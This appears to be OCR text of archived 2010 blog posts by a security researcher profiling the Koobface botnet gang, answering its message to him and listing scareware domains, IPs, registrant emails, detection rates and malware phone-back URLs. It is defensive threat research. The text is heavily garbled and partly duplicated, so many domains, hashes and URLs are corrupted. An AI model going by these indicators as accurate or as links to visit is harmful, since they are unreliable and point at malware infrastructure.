Related articles on TROYAK-AS, and various cybercrime trends: 
[19]TROYAK-AS: the cybercrime-friendly ISP that just won’t go away 
[20]AS-Troyak Exposes a Large Cybercrime Infrastructure 

[21]The current state of the crimeware threat - Q &A 

[22]Report: ZeuS crimeware kit, malicious PDFs drive growth of cybercrime 


[23]Report: Malicious PDF files comprised 80 percent of all exploits for 2009 


This post has been reproduced from [24]Dancho Danchev’s blog. 
[25]Jon Twitter. 


. http://www. antiphishing. org/reports/APWG_GlobalPhishingSurvey_2H2009. pdf 
. http://www.phishlabs.com/blog/ 


ttp://ddanchev. blogspot .com/2010/03/zeus-crimewareclient-side-exploits.htm 


ttp://ddanchev .blogspot.com/2010/03/scareware-sinowal-client-side-exploits.htm 


. http: //ddanchev.blogspot .com/2010/02/irsphotoarchive-themed-zeusclient-side.htm 
10. http://ddanchev. blogspot .com/2010/02/tax-report-themed-zeusclient-side.htm 
11. http://ddanchev. blogspot .com/2010/02/photoarchive-crimewareclient-side.htm 


12. http://ddanchev. blogspot .com/2010/01/facebookaol-update-tool-spam-campaign.htm 


13. http://ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


14. http://ddanchev. blogspot .com/2010/01/outlook-web-access-themed-spam-campaign.htm 


15. http: //ddanchev. blogspot .com/2009/12/pushdo- injecting-bogus-swine-flu.htm 


16. http://ddanchev. blogspot .com/2009/11/your-mailbox-has-been-deactivated-spam.htm 


17. http://ddanchev. blogspot .com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.htm 


18. http: //ddanchev. blogspot .com/2009/07/multitasking-fast-flux-botnet-that .htm 


Follow him 


ttp://www.zdnet.com/blog/security/cutwail-botnet-spamming- irs-—unreported-income-themed-malware/4260 


. http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/study_of_pushdo.pdf 
. http: //www.secureworks.com/research/threats/zeus/?threat=zeus 
. http: //ddanchev. blogspot .com/2010/03/as50215-troyak-as-taken-offline-zeus-c.htm 


19. http://www.zdnet .com/blog/security/troyak-as-the-cybercrime-friendly-isp-that-just-wont-go-away/5761 


20. http://rsa.com/blog/blog_entry.aspx?id=1610 


21. http://www.zdnet .com/blog/security/the-current-state-of-the-crimeware-threat-q-a/579 
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2009/547. 
24. http://ddanchev.blogspot.com/ 
25. http://twitter.com/danchodanche 


6.5.12 Koobface Gang Responds to the "10 Things You Didn’t Know About the Koob- 
face Gang Post" (2010-05-17 21:23) 


<td colspan*"3" align="centerc”><br/> 
2 <input value*'<object widehe"425" hesght"344"><parem namee"nmovie” values"hetp://..."></paraxs><exbed sree"hetp://... 
type-"application/x-shockwave-fiash” vidth="425" height="344"></enmbed></object>’ type="text” style="width: 340px"></td> 
</tr> 
</table> 
<br> 
<table style*“background-color: Neeeeee” class*"b* width="360" border="0" celipadding="0" cellapacing="0"> 
<tr> 
<td aligne*center” valigne"middle"><div aligne"lefc"><a href*"#" onclick="return 19e6S2aS27S6d62dbbb1();">More From use 
<br> 
<a hrefe"#" onclick*"return 19e8S52a52756d82dbbb1();">Related Videos</a></div> 
</div></td> 
</tr> 
</table></td> 
</tr> 
</table> 
</center> 


st </body> 
a </html> 


UPDATED Moday, May 24, 2010: The scareware domains/redirectors pushed by the Koobface 
botnet, have been included at the bottom of this post, including detection rates and phone 
back URLs. 


On May 13th, 2010, the Koobface gang responded to my " [1]10 things you didn’t know 
about the Koobface gang " post published in February, 2010, by including the following mes- 
sage within Koobface-infected hosts, serving bogus video players, and, of course, scareware: 


* regarding this [2]article By Dancho Danchev | February 23, 2010, 9:30am PST 


1. no connection 2. what’s reason to buy software just for one screenshot? 3. no connec- 
tion 4. :) 5. :) 6. :) 7. it was ‘ali baba & 4’ originally. you should be more careful 8. heh 
9. strange error. there’re no experiments on that 10. maybe. not 100 % sure 


Ali Baba 13 may 2010 


This is the [3]second individual message left by the botnet masters for me, and the third one 
in general where I’m referenced. 
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What makes an impression is their/his attempt to distance themselves/himself from ma- 
jor campaigns affecting high profile U.S based web properties, fraudulent activities such as 
click fraud, and their/his attempt to legitimize their/his malicious activities by emphasizing on 
the fact that they/he are not involved in crimeware campaigns, and have never stolen any 
credit card details. 


01. [4]The gang is connected to, probably maintaining the click-fraud facilitating Ba- 
hama botnet 
- Koobface gang: no connection 


You wish, you wish. [5]ClickForensics pointed it out, [6]I confirmed it, and at a later 
stage reproduced it. 


Among the many examples of this activities, is MD5: Ofbfla9f8e6e305138151440da58b4f1 
modifying the HOSTS file on the infected PCs to [7]redirect all the Google and Yahoo search 
traffic to 89.149.210.109, whereas, in [8]between phoning back to well known [9]Koobface 
scareware C &Cs at the time, such as 212.117.160.18, and urodinam .net/8732489273.php at 
the time. 


In May, 2010, parked on the very same IP to which urodinam.net (91.188.59.10) is cur- 
rently responding to, is an active [10]client-side exploits serving campaign using the YES 
malware exploitation kit (lzabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com). 


| can go on forever. 
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Video Responses: 10 Text Comments: 70 


Would you like to comment? 


02. [11]Despite their steady revenue flow from sales of scareware, the gang once used trial 
software to take a screenshot of a YouTube video 
- Koobface gang: what’s reason to buy software just for one screenshot? 


No reason at all, | guess that’s also the reason behind the temporary change in [12]scareware 
URIs to include GREED within the file name. 


03. [13]The Koobface gang was behind the malvertising attack the hit the web site of 
the New York Times in September 
- Koobface gang: no connection 


You wish, you wish. 


In fact, several of the recent high-profile malvertising campaigns that targeted major 
Web 2.0 properties, can be also traced back to their infrastructure. Now, whether they are 
aware of the true impact of the malvertisement campaign, and whether they are intentionally 
pushing it at a particular web site remains unknown. 


The fact is that, the exact [14]same domain that was used in the NYTimes redirection, 
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was also back then embedded on all of the Koobface infected hosts, in order to serve 
scareware. 


04. [15]The gang conducted a several hours experiment in November, 2009 when for 
the first time ever client-side exploits were embedded on Koobface-serving compromised 
hosts 

- Koobface gang: :) 


He who smiles last, smiles best. 


05. [16]The Koobface gang was behind the massive (1+ million affected web sites) 
scareware serving campaign in November, 2009 
- Koobface gang: :) 


Since they’re admitting their involvement in point 5, they also don’t know/forget that 
one of the many ways the [17]connection between the Koobface gang and massive blackhat 
SEO campaign was established in exactly the same way as the one in their involvement in the 
NYTimes malvertising campaign. Convenient denial of involvement in high-profile campaigns 
means nothing when collected data speaks for itself. 


06. [18]The Koobface Gang Monetizes Mac OS X Traffic through adult dating/Russian 
online movie marketplaces 
- Koobface gang: :) 


Read more on the practice - " [19]How the Koobface Gang Monetizes Mac OS X Traffic 


Our team, so often called “Koobface Gang”. expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

® Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of 
course analyzing software under VM Ware; 

® Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes ve've ever made; 

® Cisco for their 3rd place to our software in their annual “working groups awards"; 

® Soren Siebert with his great article; 

@ Hundreds of users who send us logs, crash reports, and wish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us 
rmnove ahead, And we've moved, And will move. Improving their security system, 


By the way, we did not have s cent using Twitter's traffic. But many security issues tell the world we did. They are wrong. 

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data. And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it :) 

Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 


07. [20]Ali Baba and 40 LLC a.k.a the Koobface gang greeted the security community on 
Christmas 
- Koobface gang: it was ‘ali baba & 4’ originally. you should be more careful 
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Since the original [21]Ali Baba had 40 thieves with him, not 4, the remaining 36 can be 
best described as the cybecrime ecosystem’s stakeholders earning revenues and having their 
business models scaling, thanks to the involvement of the Koobface botnet. 


Network Location: Sa GAA a BA 
peaked Oct 21, 2009 - Oct 21, 2009 


WP Viet | Ima 
October 21, 2008 
6,705 visits came from this network location via 1 network locations 
Goal Conversion fle = | tifiije~ 
Visits Pages/Visit Avg. Tiene on Site % New Visits Bounce Rate 
6.705 1.00 > 00:00:00 99.99% 99.96% 
% of Sie 1 93.69 te Avg 1,06 (-5,75%) } 00:00:16 (-99.44%) t 97.24% (2.83%) te Avg 98.31% (1.67%) 

© letwork Location © Visite \ Pages/Vist Avg. Tine on Ste % New Visits Bounce Rate 

1. facebook inc 6,705 100 » 00:00:00 99 99%, 99.96% 


08. [22]The Koobface gang once redirected Facebook’s IP space to my personal blog 
- Koobface gang: heh 


Read more on the topic - " [23]Koobface Botnet Redirects Facebook’s IP Space to my 
Blog ". 


09. [24]The gang is experimenting with alternative propagation strategies, such as for 
instance Skype 


- Koobface gang: strange error. there’re no experiments on that 
Hmm, who should | trust? [25]SophosLabs and [26]TrendMicro or the Koobface gang? 


SophosLabs and TrendMicro or the Koobface gang? Sophos Labs and TrendMicro or....well you 
get the point. Of course there isn’t, now that’s is publicly known it’s in the works. 
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CRUSADE-AFFILIATES 


V+0 


10. [27]The gang is monetizing traffic through the Crusade Affiliates scareware network 
- Koobface gang: maybe. not 100 % sure 


They don’t know where they get all the money by being pushing scareware? How con- 
venient. 


When data and facts talk, even "Cyber Jesus" listens. Read more on the monetization 


model - " [28]Koobface Botnet’s Scareware Business Model "; " [29]Koobface Botnet’s 
Scareware Business Model - Part Two ". 


The Koobface botnet is currently pushing scareware through 2gig-antivirus.com?mid=312 
&code=4db12f &d=1 &s=2 - 195.5.161.210 - Email: test@now.net.cn 
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Qwed-antispyware com 
l2netantispycom 
lgig-antittus.com 
lwebantwirus com A 
20g9b- artivirus.com a 
2gig-anthrus.com 
2wed-amispycom 
2wedantvirus com 
30gb-arvivitus.com 
Jwed- antispyware com " 
Swedantwirus com 
40gb-antvirus.com +  isss1e1210 > nee 1985161024 ——Ab-ge 4531282 
4web-amispycom 
4wedantvirus com 
S0gb-artivirus. com 
Sweb-anispycom 
60gb-artwirus.com 
Oweb- amispycom 
?wed-antispyware com 
cwebanthirus.com 
Owedantvinus com 
ewedantvirus com 


novad-antspyware com 


Parked on the same IP (195.5.161.210, AS31252, STARNET-AS StarNet Moldova) are also: 
Oweb-antispyware.com - Email: test@now.net.cn 
12netantispy.com - Email: test@now.net.cn 
13netantispy.com - Email: test@now.net.cn 
14netantispy.com - Email: test@now.net.cn 
16netantispy.com - Email: test@now.net.cn 
lanetantispy.com - Email: test@now.net.cn 
lbnetantispy.com - Email: test@now.net.cn 
lgb-scanner.com - Email: test@now.net.cn 
lgig-antivirus.com - Email: test@now.net.cn 
lwebantivirus.com - Email: test@now.net.cn 
20gb-antivirus.com - Email: test@now.net.cn 
2gb-scanner.com - Email: test@now.net.cn 
2gig-antivirus.com - Email: test@now.net.cn 
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2mb-scanner.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3gb-scanner.com - Email: test@now.net.cn 
3gig-antivirus.com - Email: test@now.net.cn 
3mb-scanner.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net.cn 
3webantivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 
4gb-scanner.com - Email: test@now.net.cn 
4gig-antivirus.com - Email: test@now.net.cn 
4mb-scanner.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 
4webantivirus.com - Email: test@now.net.cn 
50gb-antivirus.com - Email: test@now.net.cn 
5gb-scanner.com - Email: test@now.net.cn 
5gig-antivirus.com - Email: test@now.net.cn 
5mb-scanner.com - Email: test@now.net.cn 
5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6mb-scanner.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
aweb-antispyware.com - Email: test@now.net.cn 
awebantivirus.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 
dwebantivirus.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 
novascanner4.com - Email: test@now.net.cn 


- setup.exe - [30]Gen:Variant.Koobface.2; W32.Koobface - Result: 15/40 (37.5 %) 
- MalvRem _312s2.exe - [31]W32/FakeAlert.5!Maximus; Trojan.Win32.FakeAV - Result: 10/41 
(24.4 %) which once executed phones back to: 


- sSlsystem.com/download/winlogo.bmp - 91.213.157.104, AS13618, CARONET-AS - Email: 
contact@privacy-protect.cn 
- networkil0.com - 91.213.217.106, AS42473, ANEXIA-AS - Email: contact@privacy-protect.cn 


UPDATED: Wednesday, May 19, 2010: 

The current redirection taking place through the embedded link on Koobface infected hosts, 
takes place through: 

www3.coantys-48td.xorg.pl - 188.124.5.66 - AS44565, VITAL TEKNOLOJI 

- wwwl.fastsearch.cz.cc - 207.58.177.96 - AS25847, SERVINT Servint Corporation 


Detection rates: 
- setup.exe - [32]Win32/Koobface.NCX; Gen:Variant.Koobface.2 - Result: 13/41 (31.71 %) 
- packupdate build107 2039.exe - [33]W32/FakeAV.AM!genr; Mal/FakeAV-AX - Result: 8/41 
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(19.52 %) 


Upon execution, the scareware sample phones back to: 

updatel.myownguardian.com - 94.228.209.223, AS47869, NETROUTING-AS - Email: 
gkook@checkjemail.nl 

update2.myownguardian.net - 93.186.124.92, AS44565, VITAL TEKNOLOJI - Email: 
gkook@checkjemail.nl 


UPDATED Moday, May 24, 2010: The following Koobface scareware domains/redirectors 
have been pushed by the Koobface gang over the pat 7 days. All of them continue using the 
services of AS31252, STARNET-AS StarNet Moldova at 195.5.161.210 and 195.5.161.211. 


Oweb-antispyware.com - Email: test@now.net.cn 
12netantispy.com - Email: test@now.net.cn 
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13netantispy.com - Email: test@now.net.cn 
14netantispy.com - Email: test@now.net.cn 
15netantispy.com - Email: test@now.net.cn 
16netantispy.com - Email: test@now.net.cn 
lanetantispy.com - Email: test@now.net.cn 
lbnetantispy.com - Email: test@now.net.cn 
lcnetantispy.com - Email: test@now.net.cn 
ldnetantispy.com - Email: test@now.net.cn 
leliminatemalware.com - Email: test@now.net.cn 
leliminatespy.com - Email: test@now.net.cn 
leliminatethreats.com - Email: test@now.net.cn 
leliminatevirus.com - Email: test@now.net.cn 
lenetantispy.com - Email: test@now.net.cn 
lwebantivirus.com - Email: test@now.net.cn 
lwebfilter1000.com - Email: test@now.net.cn 
lwww-antispyware.com - Email: test@now.net.cn 
lwww-antivirus.com - Email: test@now.net.cn 
20gb-antivirus.com - Email: test@now.net.cn 
2eliminatemalware.com - Email: test@now.net.cn 
2eliminatevirus.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
2www-antispyware.com - Email: test@now.net.cn 
2www-antivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net.cn 
3webantivirus.com - Email: test@now.net.cn 
3www-antispyware.com - Email: test@now.net.cn 
3www-antivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 
4webantivirus.com - Email: test@now.net.cn 
4www-antispyware.com - Email: test@now.net.cn 
4www-antivirus.com - Email: test@now.net.cn 
5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
5www-antispyware.com - Email: test@now.net.cn 
5www-antivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
a30windows-scan.com - Email: test@now.net.cn 
a40windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a60windows-scan.com - Email: test@now.net.cn 
americanscanner.com - Email: test@now.net.cn 
aresearchsecurity.com - Email: test@now.net.cn 
awebantivirus.com - Email: test@now.net.cn 
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barracudal10.com - Email: test@now.net.cn 
beguardsystem.com - Email: test@now.net.cn 
beguardsystem2.com - Email: test@now.net.cn 
bewareofthreat.com - Email: test@now.net.cn 
bewareofydanger.com - Email: test@now.net.cn 
bprotectsystem.com - Email: test@now.net.cn 
bwebantivirus.com - Email: test@now.net.cn 
choclatescanner2.com - Email: test@now.net.cn 
cleanerscanner2.com - Email: test@now.net.cn 
cnn2scanner.com - Email: test@now.net.cn 
cprotectsystem.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 
dacota4security.com - Email: test@now.net.cn 
defencyresearch.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defensecapability.com - Email: test@now.net.cn 
dprotectsystem.com - Email: test@now.net.cn 
dwebantivirus.com - Email: test@now.net.cn 
eliminatespy.com - Email: test@now.net.cn 
eliminatethreat.com - Email: test@now.net.cn 
eliminatethreats.com - Email: test@now.net.cn 
eprotectsystem.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 
fantasticscan2.com - Email: test@now.net.cn 
fortescanner.com - Email: test@now.net.cn 
four4defence.com - Email: test@now.net.cn 
fprotectsystem.com - Email: test@now.net.cn 
house2call.com - Email: test@now.net.cn 
house4call.com - Email: test@now.net.cn 
ibewareofdanger.com - Email: test@now.net.cn 
iresearchdefence.com - Email: test@now.net.cn 
Idefenceresearch.com - Email: test@now.net.cn 
micro2smart.com - Email: test@now.net.cn 
micro4smart.com - Email: test@now.net.cn 
micro6smart.com - Email: test@now.net.cn 
necessitydefense.com - Email: test@now.net.cn 
nolongerthreat.com - Email: test@now.net.cn 
nova3-antispyware.com - Email: test@now.net.cn 
nova4-antispyware.com - Email: test@now.net.cn 
nova5-antispyware.com - Email: test@now.net.cn 
nova7-antispyware.com - Email: test@now.net.cn 
nova8-antispyware.com - Email: test@now.net.cn 
nova-antivirus1.com - Email: test@now.net.cn 
nova-antivirus2.com - Email: test@now.net.cn 
novascanner2.com - Email: test@now.net.cn 
nova-scanner2.com - Email: test@now.net.cn 
novascanner3.com - Email: test@now.net.cn 
nova-scanner3.com - Email: test@now.net.cn 
novascanner4.com - Email: test@now.net.cn 
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nova-scanner4.com - Email: test@now.net.cn 
novascanner5.com - Email: test@now.net.cn 
nova-scanner5.com - Email: test@now.net.cn 
novascanner7.com - Email: test@now.net.cn 
nova-scanner7.com - Email: test@now.net.cn 
onguardsystem2.com - Email: test@now.net.cn 
overllscanner.com - Email: test@now.net.cn 
pcguardsystem2.com - Email: test@now.net.cn 
pcguardsystems.com - Email: test@now.net.cn 
pcpiscanner.com - Email: test@now.net.cn 
pitstopscan.com - Email: test@now.net.cn 


protectionfunctions.com - Email: test@now.net.cn 


protectionmeasure.com - Email: test@now.net.cn 
protectionmethods.com - Email: test@now.net.cn 
protectionoffices.com - Email: test@now.net.cn 


protectionprinciples.com - Email: test@now.net.cn 


protectsystema.com - Email: test@now.net.cn 
protectsystemc.com - Email: test@now.net.cn 
protectsystemd.com - Email: test@now.net.cn 
protectsysteme.com - Email: test@now.net.cn 
protectsystemf.com - Email: test@now.net.cn 
researchdefence.com - Email: test@now.net.cn 
researchysecurity.com - Email: test@now.net.cn 
spywarekillera.com - Email: test@now.net.cn 
spywarekillerc.com - Email: test@now.net.cn 
spywarekillerd.com - Email: test@now.net.cn 
spywarekillere.com - Email: test@now.net.cn 
spywarekillerr.com - Email: test@now.net.cn 
spywarekillerz5.com - Email: test@now.net.cn 
stainsscanner2.com - Email: test@now.net.cn 
stop20attack.com - Email: test@now.net.cn 
tendefender2.com - Email: test@now.net.cn 
thelosers2010.com - Email: test@now.net.cn 
trivalsoftware.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
use6defence.com - Email: test@now.net.cn 
viruskiller3a.com - Email: test@now.net.cn 
viruskiller4a.com - Email: test@now.net.cn 
viruskiller5a.com - Email: test@now.net.cn 
viruskiller6a.com - Email: test@now.net.cn 
webfilter100.com - Email: test@now.net.cn 
webfilter999.com - Email: test@now.net.cn 
winguardsystem.com - Email: test@now.net.cn 
yourguardsystem.com - Email: test@now.net.cn 
yourguardsystem2.com - Email: test@now.net.cn 
z22windows-scan.com - Email: test@now.net.cn 
z23windows-scan.com - Email: test@now.net.cn 
z25windows-scan.com - Email: test@now.net.cn 
z27windows-scan.com - Email: test@now.net.cn 
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zaresearchsecurity.com - Email: test@now.net.cn 


Detection rates: 
- setup.exe - [34]Net-Worm:W32/Koobface.HN; Mal/Koobface-D - Result: 11/41 (26.83 %) 
- avdistr 312.exe - [35]Trojan.FakeAV!gen24; Trojan.FakeAV - Result: 8/41 (19.52 %) 


Upon execution phones back to: 
slsystem.com/download/winlogo.bmp - 91.213.157.104 - Email: contact@privacy-protect.cn 
accsupdate.com/?b=103s1 - 193.105.134.115 - Email: contact@privacy-protect.cn 


Previous parked on 91.213.217.106, AS42473, ANEXIA-AS now responding to 193.105.134.115, 
AS42708, PORTLANE: 

networkil0.com - Email: contact@privacy-protect.cn 

winsecuresoftorder.com - Email: contact@privacy-protect.cn 

time-zoneserver.com - Email: contact@privacy-protect.cn 

1blacklist.com - Email: contact@privacy-protect.cn 


In order to understand the importance of profiling Koobface gang’s activities, consider 
going their their underground multitasking campaigns in the related posts. 


Related Koobface botnet/Koobface gang research: 

[36]From the Koobface Gang with Scareware Serving Compromised Sites 
[37]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[38]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[39]10 things you didn’t know about the Koobface gang 

[40]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 
[41]How the Koobface Gang Monetizes Mac OS X Traffic 

[42]The Koobface Gang Wishes the Industry "Happy Holidays" 
[43]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[44]Koobface Botnet Starts Serving Client-Side Exploits 

[45]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[46]Koobface Botnet’s Scareware Business Model - Part Two 
[47]Koobface Botnet’s Scareware Business Model - Part One 
[48]Koobface Botnet Redirects Facebook’s IP Space to my Blog 

[49]New Koobface campaign spoofs Adobe’s Flash updater 

[50]Social engineering tactics of the Koobface botnet 

[51]Koobface Botnet Dissected in a TrendMicro Report 

[52]Movement on the Koobface Front - Part Two 

[53]Movement on the Koobface Front 

[54]Koobface - Come Out, Come Out, Wherever You Are 

[55]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [56]Dancho Danchev’s blog. Follow him 
[57]Jon Twitter. 


1. http: //www.zdnet .com/blog/security/10-things- you-didnt-know- about -the-koobface- gang/5452 


2. http://www. zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


3. http: //ddanchev. blogspot .com/2009/12/koobface-gang-wishes-industry-happy.htm 


4. http: //www.zdnet .com/blog/security/10-things- you-didnt-know- about-the-koobface-gang/5452 


5. http: //blog.clickforensics.com/?p=314 
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6. http://www.zdnet.com/blog/security/click-fraud-facilitating-bahama-botnet-steals-ad-revenue-from-google/4 


5497p=4549 


7. http://www.zdnet .com/blog/security/cybercriminals-promoting-malware-friendly-search-engines/3333?p=333 


8. http: //ddanchev. blogspot. com/2009/11/koobface-botnets-scareware-business.htm 
9. http: //ddanchev. blogspot . com/2009/09/koobface-botnets-scareware-business .htm 


10. http://ddanchev. blogspot .com/2010/05/dissecting-mass-dreamhost-sites. html 


ttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about- the-koobface-gang/5452 


12. http://ddanchev. blogspot .com/2010/03/koobface-redirectors-and-scareware .htm 


ttp://www.zdnet .com/blog/security/10-things-you-didnt-know-about- the-koobface-gang/5452 


14. http://ddanchev. blogspot .com/2009/09/ukrainian-fan-club-features.htm 


ttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about- the-koobface-gang/5452 


ttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about- the-koobface-gang/5452 


17. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 


ttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about- the-koobface-gang/5452 


19. http://ddanchev. blogspot .com/2010/02/how-koobface-gang-monetizes-mac-os-x.htm 


ttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


21. http://en.wikipedia.org/wiki/Ali_Baba 


ttp://www.zdnet .com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452 


23. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 


25. http://www. sophos.com/blogs/sophoslabs/v/post/748 
26. http://blog.trendmicro.com/new-koobface-variant-targets-skype/ 


28. http://ddanchev. blogspot . com/2009/09/koobface-botnets-scareware-business .htm 
29. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business .htm 
30. http://www. virustotal .com/analisis/193880563e8af90c505e3666d07 14bc3f 08ef6c766c14c292324d6df feffea90-1274 


1. http://www.virustotal .com/analisis/462c01a58bb0c14183b9ca29c308723229b309dc43f 4be88dc0df 52a5ba678ef -1274 


2. http: //www.virustotal.com/analisis/43980c45a2294b28bf56deb2a0ecf6128e88443701cc452b4523ea1396e445b2- 12742 
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3. http://www.virustotal .com/analisis/7251f£88756fbbe7 £662ad6a9a3d4ffd26a2bb6ef ce5e10dd9d6027ed9e513932- 12742 


4. http: //www.virustotal.com/analisis/0e7c5453bfbde52ee760c91086ec 12d61d67737eeceea2fdab0d063a7b582910-1274 
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5. bttp://www.virustotal .com/analisis/29387350103fb3b537eeaced5b7d6ad02ee123c5a992cb09F e5f2b185c741b3a-1274 


st) 
Mi 
© 
x 


WwW 
(o>) 


. http: //ddanchev. blogspot .com/2010/05/from-koobface- gang-with-scareware.htm 
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. http://ddanchev. blogspot .com/2010/04/dissecting-koobface-gangs- latest .htm 


38. http://ddanchev. blogspot . com/2010/03/koobface-redirectors-and-scareware.html 


40. http://ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat.htm 


42. 
43. 
44. 


45. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 


46. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 
47. http://ddanchev. blogspot .com/2009/09/koobface-botnets-scareware- business. htm 


48. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
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49. http: //blogs.zdnet .com/security/?p=4594 
50. http://content.zdnet .com/2346-12691_22-352597 .htm 


ttp://ddanchev. blogspot. com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 


52. http: //ddanchev. blogspot . com/2009/08/movement-on-koobface-front-part-two.htm 


53. http: //ddanchev. blogspot . com/2009/08/movement-on-koobface-front .htm 


ttp://ddanchev. blogspot .com/2009/07/koobface- come-out-come-out-wherever-you.htm 


ttp://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter .htm 


56. http: //ddanchev. blogspot .com/ 
57. http://twitter.com/danchodanche 


6.5.13  Koobface Gang Responds to the "10 Things You Didn’t Know About the Koob- 
face Gang Post" (2010-05-17 21:23) 


<td colspan="3" align="center”><br/> 
<input value='<object widehe"425" hesght="344"><parem namee"movie” values"hetp://..."></paras<exbed sree"hetp://...* 
type*"application/x-shockvave-fiash” vidth="425" height="344"></embed></object>’ type="text” style="width: 340px"></td> 
</tr> 


</table> 
<br> 
<table style*“background-color: Neeeeee” class*"b* width="360" border="0" celipadding="0" cellapacing="0"> 
<tr> 
<td align=*center”® valigne"middle"><div align="lefc"><ca hrefe"#" onclick="return 19e8S2aS27Sé6éd62dbbb1();">Nore From us¢ 
<br> 
<a hrerte"#" onclick*"return 19e8S2aS527S56d82dbbb1();">Related Videos</a></div> 


</div></td> 
</tr> 
‘ </table></td> 
</tr> 
</table> 
</center> 


s? </body> 
</html> 


UPDATED Moday, May 24, 2010: The scareware domains/redirectors pushed by the Koobface 
botnet, have been included at the bottom of this post, including detection rates and phone 
back URLs. 


On May 13th, 2010, the Koobface gang responded to my " [1]10 things you didn’t know 
about the Koobface gang " post published in February, 2010, by including the following mes- 
sage within Koobface-infected hosts, serving bogus video players, and, of course, scareware: 
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* regarding this [2]article By Dancho Danchev | February 23, 2010, 9:30am PST 


1. no connection 2. what’s reason to buy software just for one screenshot? 3. no connec- 
tion 4. :) 5. :) 6. :) 7. it was ‘ali baba & 4’ originally. you should be more careful 8. heh 
9. strange error. there’re no experiments on that 10. maybe. not 100 % sure 


Ali Baba 13 may 2010 


This is the [3]second individual message left by the botnet masters for me, and the third one 
in general where I’m referenced. 


What makes an impression is their/his attempt to distance themselves/himself from ma- 
jor campaigns affecting high profile U.S based web properties, fraudulent activities such as 
click fraud, and their/his attempt to legitimize their/his malicious activities by emphasizing on 
the fact that they/he are not involved in crimeware campaigns, and have never stolen any 
credit card details. 


01. [4]The gang is connected to, probably maintaining the click-fraud facilitating Ba- 
hama botnet 


- Koobface gang: no connection 


You wish, you wish. [5]ClickForensics pointed it out, [6]I confirmed it, and at a later 
stage reproduced it. 


Among the many examples of this activities, is MD5: Ofbfla9f8e6e305138151440da58b4f1 
modifying the HOSTS file on the infected PCs to [7]redirect all the Google and Yahoo search 
traffic to 89.149.210.109, whereas, in [8]between phoning back to well known [9]Koobface 
scareware C &Cs at the time, such as 212.117.160.18, and urodinam .net/8732489273.php at 
the time. 


In May, 2010, parked on the very same IP to which urodinam.net (91.188.59.10) is cur- 
